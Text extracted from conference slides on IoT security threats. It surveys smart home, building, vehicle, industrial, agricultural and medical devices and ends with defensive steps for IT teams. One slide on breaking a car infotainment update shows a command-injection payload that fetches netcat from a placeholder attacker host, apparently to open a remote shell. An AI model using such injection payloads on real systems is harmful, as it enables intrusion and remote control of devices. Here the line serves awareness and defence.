The of Threats BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE

Chris Poulin IoT Researcher, Futurist

CyberCrime 2016 Symposium: Cyber Convergence The easiest way to hack an Airbus A319

. Maker . Breaker . Threat intel . Data geek . Provocateur . TV & movies Some questions to establish context

 What is your role wrt the IoT? • Personal consumer of the IoT • Enterprise manager of IT systems • A maker of IoT devices

 What is your biggest concern with the IoT? • Safety (e.g., HVAC systems gone wild) • Data privacy • Infrastructure security (e.g., IT comingling with IoT) • New enterprise attack vectors (e.g., end users with wearables)

Smart Home Device Examples: Home Security

 Security control and alarm panels  Smart door locks  Smart garage doors  Motion detectors  Window and door contacts  Security cameras  Smart doorbells Smart Fridge Smart Faucet

Smart Lighting

Smart Oven

Smart Dishwasher Smart Utensils Smart Television

Smart Wine Smart Home Device Examples: Appliances, Lighting, Entertainment

 Appliances • Refrigerators and cooktops • Beds • Autonomous vacuums  Lighting • Light bulbs (plain white and color changing) • Pathway lighting • Indoor and outdoor  Entertainment • Smart televisions and DVRs • Audio systems Smart Home Device Examples: Environment & Safety

Smart thermostats Smoke / CO detectors Smart air conditioners

Smart blinds Water leak detectors Baby monitors Smart homes are vulnerable

“Buy V!gar4”

Your WiFi password is “fluffy123” Why does home automation matter to enterprise IT security? malware infected devices

Krebs 620-650 Gbps OVH ~1 Tbps Dyn , PayPal, Box, Slack, , GitHub, , Airbnb, Pinterest, , Spotify, Yelp, Second Life, WWE Network Smart Lighting

Concrete Monitors

Smart Doors

Smart Elevators IIoT Device Examples: Building Automation

 Electric & water  HVAC  Security systems  Lighting  Elevators and escalators  Polarized windows  Earthquake absorbers  Concrete mixing & curing

And they will be connected to your IT networks

IT Network BAS Network Connected Infrastructure

Connected Cars IIoT Device Examples: Smart Cities & Municipalities

 Utilities  Lighting  Traffic flow  Trash  Air quality  Violence detection

Connected vehicle threat surface

Bluetooth, WiFi, media players Car Multimedia

OnStar, Uconnect, etc. Dynamic Stability Control

Instrument Cluster / Telematics Airbag Control Unit Transmission Control Unit Keyless Entry / Anti-theft

Engine Control Unit OBD-II Direct connection RF channel Anti-lock Braking System Vehicle to Vehicle / Vehicle to Infrastructure Communications Tire Pressure Monitor

RF channel DSRC RF IVIs are messy

Linux / Tizen / QNX

Audio module Apple CarPlay Telematics (open source?) module GPS module Video module Google Android (open source?) module WiFi module Voice module Microsoft Sync (open source?) module Update feature …so let’s break one

updates.txt somepkg ‘; wget http://evil.org/nc; nc …

Port 6667/TCP SPI

V850 CAN bus Number of latent vulnerabilities in a modern luxury vehicle Using the Linux kernel as a comparative model (as of 10 Oct 2016) 15M lines of code in Linux Kernel

1,507 reported vulnerabilities ~10,000 latent 1 vulnerability in vulnerabilities every 9,954 lines of code

Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html The perfect storm of resources & tools Build your own vehicle eBay, SparkFun, hacking lab & test cart etc.

Protocol decodes available

http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf http://illmatics.com/car_hacking_poories.pdf http://marco.guardigli.it/2010/10/hacking-your-car.html http://opengarages.org/handbook/ IIoT Device Examples: Heavy Industries

 Manufacturing: • Pumps • Conveyors • Robots

 Energy & Utilities: • Smart meters • Transformers • Pumps • Dam gates

Industrial IoT incidents

German steel mill

Stuxnet Agricultural vulnerabilities

. Planters: seed depth . Sprayers: dosage manipulation . Silos: manipulate environment . Livestock: feeding, drug, and environmental systems manipulation . Milk: manipulate pasteurization and pH balancesystems . Hydroponics: manipulate environment . Irrigation: manipulate control and data . Seeds: manipulate environment . Slaughter: remote control—effect? Who knows… . Processing: manipulate waste system (reverse?) IIoT Device Examples: Consumer Services

 Healthcare • X-ray machines • Chemistry analyzers • Pacemakers, insulin pumps

 Retail • Inventory tracking • Stocking & picking • Shipping Healthcare: hacking a telesurgery unit Wearable device examples

Google Glass Android Wear Fitness Trackers Apple Watch

Insulin pumps

Pacemakers Subcutaneous vitals monitor Wearables security

Fitbit Bluetooth

Sync to PC

Malware: PC pwned!

Be Winston Wolfe. Solve problems.

“You’ve got a corpse in the car, minus a head. Take me to it.” The layers of the IoT

Traditional IT Services & Security IoT defense for IT security professionals (1 of 4)

1. Conduct an asset inventory • Focus on critical assets and sensitive data • NetFlow to passively identify assets • VA scans to actively identify assets and add context • RF scanning • GQRX • Scripting skilllz IoT defense for IT security professionals (2 of 4)

2. Segment systems based on risk

• Enclave firewalls

• Software defined networks

3. Monitor & defend IoT devices on the network

• IDS / IPS

• NetFlow—look for anomalies

• Map relationships of wearables to mobile to users IoT defense for IT security professionals (3 of 4)

4. Protect IT endpoints

• Endpoint protection software

• VA scanning / patching

• Phishing exercises

5. Collect logs and events from IoT devices

• Log management / SIEM IoT defense for IT security professionals (4 of 4)

6. Update security policies to include IoT devices

7. Familiarize yourself with non-IT connected devices Resources for makers

https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project http://builditsecure.ly/ https://www.iamthecavalry.org/